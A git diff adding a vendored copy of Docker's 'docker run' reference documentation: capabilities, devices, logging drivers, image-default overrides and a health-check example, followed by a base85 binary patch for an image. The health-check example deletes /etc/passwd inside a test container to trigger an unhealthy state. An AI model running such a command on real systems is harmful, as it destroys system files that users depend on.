Blog](http://blog.docker.com/2013/09/docker-can-now-run-within-docker/). + +If you want to limit access to a specific device or devices you can use +the `--device` flag. It allows you to specify one or more devices that +will be accessible within the container. + + $ docker run --device=/dev/snd:/dev/snd ... + +By default, the container will be able to `read`, `write`, and `mknod` these devices. +This can be overridden using a third `:rwm` set of options to each `--device` flag: + + $ docker run --device=/dev/sda:/dev/xvdc --rm -it ubuntu fdisk /dev/xvdc + + Command (m for help): q + $ docker run --device=/dev/sda:/dev/xvdc:r --rm -it ubuntu fdisk /dev/xvdc + You will not be able to write the partition table. + + Command (m for help): q + + $ docker run --device=/dev/sda:/dev/xvdc:w --rm -it ubuntu fdisk /dev/xvdc + crash.... + + $ docker run --device=/dev/sda:/dev/xvdc:m --rm -it ubuntu fdisk /dev/xvdc + fdisk: unable to open /dev/xvdc: Operation not permitted + +In addition to `--privileged`, the operator can have fine grain control over the +capabilities using `--cap-add` and `--cap-drop`. By default, Docker has a default +list of capabilities that are kept. The following table lists the Linux capability +options which are allowed by default and can be dropped. + +| Capability Key | Capability Description | +| ---------------- | ----------------------------------------------------------------------------------------------------------------------------- | +| SETPCAP | Modify process capabilities. | +| MKNOD | Create special files using mknod(2). | +| AUDIT_WRITE | Write records to kernel auditing log. | +| CHOWN | Make arbitrary changes to file UIDs and GIDs (see chown(2)). | +| NET_RAW | Use RAW and PACKET sockets. | +| DAC_OVERRIDE | Bypass file read, write, and execute permission checks. | +| FOWNER | Bypass permission checks on operations that normally require the file system UID of the process to match the UID of the file. | +| FSETID | Don't clear set-user-ID and set-group-ID permission bits when a file is modified. | +| KILL | Bypass permission checks for sending signals. | +| SETGID | Make arbitrary manipulations of process GIDs and supplementary GID list. | +| SETUID | Make arbitrary manipulations of process UIDs. | +| NET_BIND_SERVICE | Bind a socket to internet domain privileged ports (port numbers less than 1024). | +| SYS_CHROOT | Use chroot(2), change root directory. | +| SETFCAP | Set file capabilities. | + +The next table shows the capabilities which are not granted by default and may be added. + +| Capability Key | Capability Description | +| ---------------- | ----------------------------------------------------------------------------------------------------------------------------- | +| SYS_MODULE | Load and unload kernel modules. | +| SYS_RAWIO | Perform I/O port operations (iopl(2) and ioperm(2)). | +| SYS_PACCT | Use acct(2), switch process accounting on or off. | +| SYS_ADMIN | Perform a range of system administration operations. | +| SYS_NICE | Raise process nice value (nice(2), setpriority(2)) and change the nice value for arbitrary processes. | +| SYS_RESOURCE | Override resource Limits. | +| SYS_TIME | Set system clock (settimeofday(2), stime(2), adjtimex(2)); set real-time (hardware) clock. | +| SYS_TTY_CONFIG | Use vhangup(2); employ various privileged ioctl(2) operations on virtual terminals. | +| AUDIT_CONTROL | Enable and disable kernel auditing; change auditing filter rules; retrieve auditing status and filtering rules. | +| MAC_OVERRIDE | Allow MAC configuration or state changes. Implemented for the Smack LSM. | +| MAC_ADMIN | Override Mandatory Access Control (MAC). Implemented for the Smack Linux Security Module (LSM). | +| NET_ADMIN | Perform various network-related operations. | +| SYSLOG | Perform privileged syslog(2) operations. | +| DAC_READ_SEARCH | Bypass file read permission checks and directory read and execute permission checks. | +| LINUX_IMMUTABLE | Set the FS_APPEND_FL and FS_IMMUTABLE_FL i-node flags. | +| NET_BROADCAST | Make socket broadcasts, and listen to multicasts. | +| IPC_LOCK | Lock memory (mlock(2), mlockall(2), mmap(2), shmctl(2)). | +| IPC_OWNER | Bypass permission checks for operations on System V IPC objects. | +| SYS_PTRACE | Trace arbitrary processes using ptrace(2). | +| SYS_BOOT | Use reboot(2) and kexec_load(2), reboot and load a new kernel for later execution. | +| LEASE | Establish leases on arbitrary files (see fcntl(2)). | +| WAKE_ALARM | Trigger something that will wake up the system. | +| BLOCK_SUSPEND | Employ features that can block system suspend. | + +Further reference information is available on the [capabilities(7) - Linux man page](http://man7.org/linux/man-pages/man7/capabilities.7.html) + +Both flags support the value `ALL`, so if the +operator wants to have all capabilities but `MKNOD` they could use: + + $ docker run --cap-add=ALL --cap-drop=MKNOD ... + +For interacting with the network stack, instead of using `--privileged` they +should use `--cap-add=NET_ADMIN` to modify the network interfaces. + + $ docker run -it --rm ubuntu:14.04 ip link add dummy0 type dummy + RTNETLINK answers: Operation not permitted + $ docker run -it --rm --cap-add=NET_ADMIN ubuntu:14.04 ip link add dummy0 type dummy + +To mount a FUSE based filesystem, you need to combine both `--cap-add` and +`--device`: + + $ docker run --rm -it --cap-add SYS_ADMIN sshfs sshfs sven@10.10.10.20:/home/sven /mnt + fuse: failed to open /dev/fuse: Operation not permitted + $ docker run --rm -it --device /dev/fuse sshfs sshfs sven@10.10.10.20:/home/sven /mnt + fusermount: mount failed: Operation not permitted + $ docker run --rm -it --cap-add SYS_ADMIN --device /dev/fuse sshfs + # sshfs sven@10.10.10.20:/home/sven /mnt + The authenticity of host '10.10.10.20 (10.10.10.20)' can't be established. + ECDSA key fingerprint is 25:34:85:75:25:b0:17:46:05:19:04:93:b5:dd:5f:c6. + Are you sure you want to continue connecting (yes/no)? yes + sven@10.10.10.20's password: + root@30aa0cfaf1b5:/# ls -la /mnt/src/docker + total 1516 + drwxrwxr-x 1 1000 1000 4096 Dec 4 06:08 . + drwxrwxr-x 1 1000 1000 4096 Dec 4 11:46 .. + -rw-rw-r-- 1 1000 1000 16 Oct 8 00:09 .dockerignore + -rwxrwxr-x 1 1000 1000 464 Oct 8 00:09 .drone.yml + drwxrwxr-x 1 1000 1000 4096 Dec 4 06:11 .git + -rw-rw-r-- 1 1000 1000 461 Dec 4 06:08 .gitignore + .... + +The default seccomp profile will adjust to the selected capabilities, in order to allow +use of facilities allowed by the capabilities, so you should not have to adjust this, +since Docker 1.12. In Docker 1.10 and 1.11 this did not happen and it may be necessary +to use a custom seccomp profile or use `--security-opt seccomp=unconfined` when adding +capabilities. + +## Logging drivers (--log-driver) + +The container can have a different logging driver than the Docker daemon. Use +the `--log-driver=VALUE` with the `docker run` command to configure the +container's logging driver. The following options are supported: + +| Driver | Description | +| ----------- | ----------------------------------------------------------------------------------------------------------------------------- | +| `none` | Disables any logging for the container. `docker logs` won't be available with this driver. | +| `json-file` | Default logging driver for Docker. Writes JSON messages to file. No logging options are supported for this driver. | +| `syslog` | Syslog logging driver for Docker. Writes log messages to syslog. | +| `journald` | Journald logging driver for Docker. Writes log messages to `journald`. | +| `gelf` | Graylog Extended Log Format (GELF) logging driver for Docker. Writes log messages to a GELF endpoint likeGraylog or Logstash. | +| `fluentd` | Fluentd logging driver for Docker. Writes log messages to `fluentd` (forward input). | +| `awslogs` | Amazon CloudWatch Logs logging driver for Docker. Writes log messages to Amazon CloudWatch Logs | +| `splunk` | Splunk logging driver for Docker. Writes log messages to `splunk` using Event Http Collector. | + +The `docker logs` command is available only for the `json-file` and `journald` +logging drivers. For detailed information on working with logging drivers, see +[Configure a logging driver](https://docs.docker.com/engine/admin/logging/overview/). + + +## Overriding Dockerfile image defaults + +When a developer builds an image from a [*Dockerfile*](builder.md) +or when she commits it, the developer can set a number of default parameters +that take effect when the image starts up as a container. + +Four of the Dockerfile commands cannot be overridden at runtime: `FROM`, +`MAINTAINER`, `RUN`, and `ADD`. Everything else has a corresponding override +in `docker run`. We'll go through what the developer might have set in each +Dockerfile instruction and how the operator can override that setting. + + - [CMD (Default Command or Options)](#cmd-default-command-or-options) + - [ENTRYPOINT (Default Command to Execute at Runtime)]( + #entrypoint-default-command-to-execute-at-runtime) + - [EXPOSE (Incoming Ports)](#expose-incoming-ports) + - [ENV (Environment Variables)](#env-environment-variables) + - [HEALTHCHECK](#healthcheck) + - [VOLUME (Shared Filesystems)](#volume-shared-filesystems) + - [USER](#user) + - [WORKDIR](#workdir) + +### CMD (default command or options) + +Recall the optional `COMMAND` in the Docker +commandline: + + $ docker run [OPTIONS] IMAGE[:TAG|@DIGEST] [COMMAND] [ARG...] + +This command is optional because the person who created the `IMAGE` may +have already provided a default `COMMAND` using the Dockerfile `CMD` +instruction. As the operator (the person running a container from the +image), you can override that `CMD` instruction just by specifying a new +`COMMAND`. + +If the image also specifies an `ENTRYPOINT` then the `CMD` or `COMMAND` +get appended as arguments to the `ENTRYPOINT`. + +### ENTRYPOINT (default command to execute at runtime) + + --entrypoint="": Overwrite the default entrypoint set by the image + +The `ENTRYPOINT` of an image is similar to a `COMMAND` because it +specifies what executable to run when the container starts, but it is +(purposely) more difficult to override. The `ENTRYPOINT` gives a +container its default nature or behavior, so that when you set an +`ENTRYPOINT` you can run the container *as if it were that binary*, +complete with default options, and you can pass in more options via the +`COMMAND`. But, sometimes an operator may want to run something else +inside the container, so you can override the default `ENTRYPOINT` at +runtime by using a string to specify the new `ENTRYPOINT`. Here is an +example of how to run a shell in a container that has been set up to +automatically run something else (like `/usr/bin/redis-server`): + + $ docker run -it --entrypoint /bin/bash example/redis + +or two examples of how to pass more parameters to that ENTRYPOINT: + + $ docker run -it --entrypoint /bin/bash example/redis -c ls -l + $ docker run -it --entrypoint /usr/bin/redis-cli example/redis --help + +You can reset a containers entrypoint by passing an empty string, for example: + + $ docker run -it --entrypoint="" mysql bash + +> **Note**: Passing `--entrypoint` will clear out any default command set on the +> image (i.e. any `CMD` instruction in the Dockerfile used to build it). + +### EXPOSE (incoming ports) + +The following `run` command options work with container networking: + + --expose=[]: Expose a port or a range of ports inside the container. + These are additional to those exposed by the `EXPOSE` instruction + -P : Publish all exposed ports to the host interfaces + -p=[] : Publish a container᾿s port or a range of ports to the host + format: ip:hostPort:containerPort | ip::containerPort | hostPort:containerPort | containerPort + Both hostPort and containerPort can be specified as a + range of ports. When specifying ranges for both, the + number of container ports in the range must match the + number of host ports in the range, for example: + -p 1234-1236:1234-1236/tcp + + When specifying a range for hostPort only, the + containerPort must not be a range. In this case the + container port is published somewhere within the + specified hostPort range. (e.g., `-p 1234-1236:1234/tcp`) + + (use 'docker port' to see the actual mapping) + + --link="" : Add link to another container (:alias or ) + +With the exception of the `EXPOSE` directive, an image developer hasn't +got much control over networking. The `EXPOSE` instruction defines the +initial incoming ports that provide services. These ports are available +to processes inside the container. An operator can use the `--expose` +option to add to the exposed ports. + +To expose a container's internal port, an operator can start the +container with the `-P` or `-p` flag. The exposed port is accessible on +the host and the ports are available to any client that can reach the +host. + +The `-P` option publishes all the ports to the host interfaces. Docker +binds each exposed port to a random port on the host. The range of +ports are within an *ephemeral port range* defined by +`/proc/sys/net/ipv4/ip_local_port_range`. Use the `-p` flag to +explicitly map a single port or range of ports. + +The port number inside the container (where the service listens) does +not need to match the port number exposed on the outside of the +container (where clients connect). For example, inside the container an +HTTP service is listening on port 80 (and so the image developer +specifies `EXPOSE 80` in the Dockerfile). At runtime, the port might be +bound to 42800 on the host. To find the mapping between the host ports +and the exposed ports, use `docker port`. + +If the operator uses `--link` when starting a new client container in the +default bridge network, then the client container can access the exposed +port via a private networking interface. +If `--link` is used when starting a container in a user-defined network as +described in [*Docker network overview*](https://docs.docker.com/engine/userguide/networking/), +it will provide a named alias for the container being linked to. + +### ENV (environment variables) + +When a new container is created, Docker will set the following environment +variables automatically: + +| Variable | Value | +| -------- | ----- | +| `HOME` | Set based on the value of `USER` | +| `HOSTNAME` | The hostname associated with the container | +| `PATH` | Includes popular directories, such as `:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin` | +| `TERM` | `xterm` if the container is allocated a pseudo-TTY | + +Additionally, the operator can **set any environment variable** in the +container by using one or more `-e` flags, even overriding those mentioned +above, or already defined by the developer with a Dockerfile `ENV`: + + $ docker run -e "deep=purple" --rm ubuntu /bin/bash -c export + declare -x HOME="/" + declare -x HOSTNAME="85bc26a0e200" + declare -x OLDPWD + declare -x PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + declare -x PWD="/" + declare -x SHLVL="1" + declare -x deep="purple" + +Similarly the operator can set the **hostname** with `-h`. + +### HEALTHCHECK + +``` + --health-cmd Command to run to check health + --health-interval Time between running the check + --health-retries Consecutive failures needed to report unhealthy + --health-timeout Maximum time to allow one check to run + --no-healthcheck Disable any container-specified HEALTHCHECK +``` + +Example: + + {% raw %} + $ docker run --name=test -d \ + --health-cmd='stat /etc/passwd || exit 1' \ + --health-interval=2s \ + busybox sleep 1d + $ sleep 2; docker inspect --format='{{.State.Health.Status}}' test + healthy + $ docker exec test rm /etc/passwd + $ sleep 2; docker inspect --format='{{json .State.Health}}' test + { + "Status": "unhealthy", + "FailingStreak": 3, + "Log": [ + { + "Start": "2016-05-25T17:22:04.635478668Z", + "End": "2016-05-25T17:22:04.7272552Z", + "ExitCode": 0, + "Output": " File: /etc/passwd\n Size: 334 \tBlocks: 8 IO Block: 4096 regular file\nDevice: 32h/50d\tInode: 12 Links: 1\nAccess: (0664/-rw-rw-r--) Uid: ( 0/ root) Gid: ( 0/ root)\nAccess: 2015-12-05 22:05:32.000000000\nModify: 2015..." + }, + { + "Start": "2016-05-25T17:22:06.732900633Z", + "End": "2016-05-25T17:22:06.822168935Z", + "ExitCode": 0, + "Output": " File: /etc/passwd\n Size: 334 \tBlocks: 8 IO Block: 4096 regular file\nDevice: 32h/50d\tInode: 12 Links: 1\nAccess: (0664/-rw-rw-r--) Uid: ( 0/ root) Gid: ( 0/ root)\nAccess: 2015-12-05 22:05:32.000000000\nModify: 2015..." + }, + { + "Start": "2016-05-25T17:22:08.823956535Z", + "End": "2016-05-25T17:22:08.897359124Z", + "ExitCode": 1, + "Output": "stat: can't stat '/etc/passwd': No such file or directory\n" + }, + { + "Start": "2016-05-25T17:22:10.898802931Z", + "End": "2016-05-25T17:22:10.969631866Z", + "ExitCode": 1, + "Output": "stat: can't stat '/etc/passwd': No such file or directory\n" + }, + { + "Start": "2016-05-25T17:22:12.971033523Z", + "End": "2016-05-25T17:22:13.082015516Z", + "ExitCode": 1, + "Output": "stat: can't stat '/etc/passwd': No such file or directory\n" + } + ] + } + {% endraw %} + +The health status is also displayed in the `docker ps` output. + +### TMPFS (mount tmpfs filesystems) + +```bash +--tmpfs=[]: Create a tmpfs mount with: container-dir[:], + where the options are identical to the Linux + 'mount -t tmpfs -o' command. +``` + +The example below mounts an empty tmpfs into the container with the `rw`, +`noexec`, `nosuid`, and `size=65536k` options. + + $ docker run -d --tmpfs /run:rw,noexec,nosuid,size=65536k my_image + +### VOLUME (shared filesystems) + + -v, --volume=[host-src:]container-dest[:]: Bind mount a volume. + The comma-delimited `options` are [rw|ro], [z|Z], + [[r]shared|[r]slave|[r]private], and [nocopy]. + The 'host-src' is an absolute path or a name value. + + If neither 'rw' or 'ro' is specified then the volume is mounted in + read-write mode. + + The `nocopy` modes is used to disable automatic copying requested volume + path in the container to the volume storage location. + For named volumes, `copy` is the default mode. Copy modes are not supported + for bind-mounted volumes. + + --volumes-from="": Mount all volumes from the given container(s) + +> **Note**: +> When using systemd to manage the Docker daemon's start and stop, in the systemd +> unit file there is an option to control mount propagation for the Docker daemon +> itself, called `MountFlags`. The value of this setting may cause Docker to not +> see mount propagation changes made on the mount point. For example, if this value +> is `slave`, you may not be able to use the `shared` or `rshared` propagation on +> a volume. + +The volumes commands are complex enough to have their own documentation +in section [*Manage data in +containers*](https://docs.docker.com/engine/tutorials/dockervolumes/). A developer can define +one or more `VOLUME`'s associated with an image, but only the operator +can give access from one container to another (or from a container to a +volume mounted on the host). + +The `container-dest` must always be an absolute path such as `/src/docs`. +The `host-src` can either be an absolute path or a `name` value. If you +supply an absolute path for the `host-dir`, Docker bind-mounts to the path +you specify. If you supply a `name`, Docker creates a named volume by that `name`. + +A `name` value must start with an alphanumeric character, +followed by `a-z0-9`, `_` (underscore), `.` (period) or `-` (hyphen). +An absolute path starts with a `/` (forward slash). + +For example, you can specify either `/foo` or `foo` for a `host-src` value. +If you supply the `/foo` value, Docker creates a bind-mount. If you supply +the `foo` specification, Docker creates a named volume. + +### USER + +`root` (id = 0) is the default user within a container. The image developer can +create additional users. Those users are accessible by name. When passing a numeric +ID, the user does not have to exist in the container. + +The developer can set a default user to run the first process with the +Dockerfile `USER` instruction. When starting a container, the operator can override +the `USER` instruction by passing the `-u` option. + + -u="", --user="": Sets the username or UID used and optionally the groupname or GID for the specified command. + + The followings examples are all valid: + --user=[ user | user:group | uid | uid:gid | user:gid | uid:group ] + +> **Note:** if you pass a numeric uid, it must be in the range of 0-2147483647. + +### WORKDIR + +The default working directory for running binaries within a container is the +root directory (`/`), but the developer can set a different default with the +Dockerfile `WORKDIR` command. The operator can override this with: + + -w="": Working directory inside the container diff --git a/vendor/github.com/docker/docker/docs/static_files/contributors.png b/vendor/github.com/docker/docker/docs/static_files/contributors.png new file mode 100644 index 0000000000000000000000000000000000000000..63c0a0c09b58bce2e1ade867760a937612934202 GIT binary patch literal 23100 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 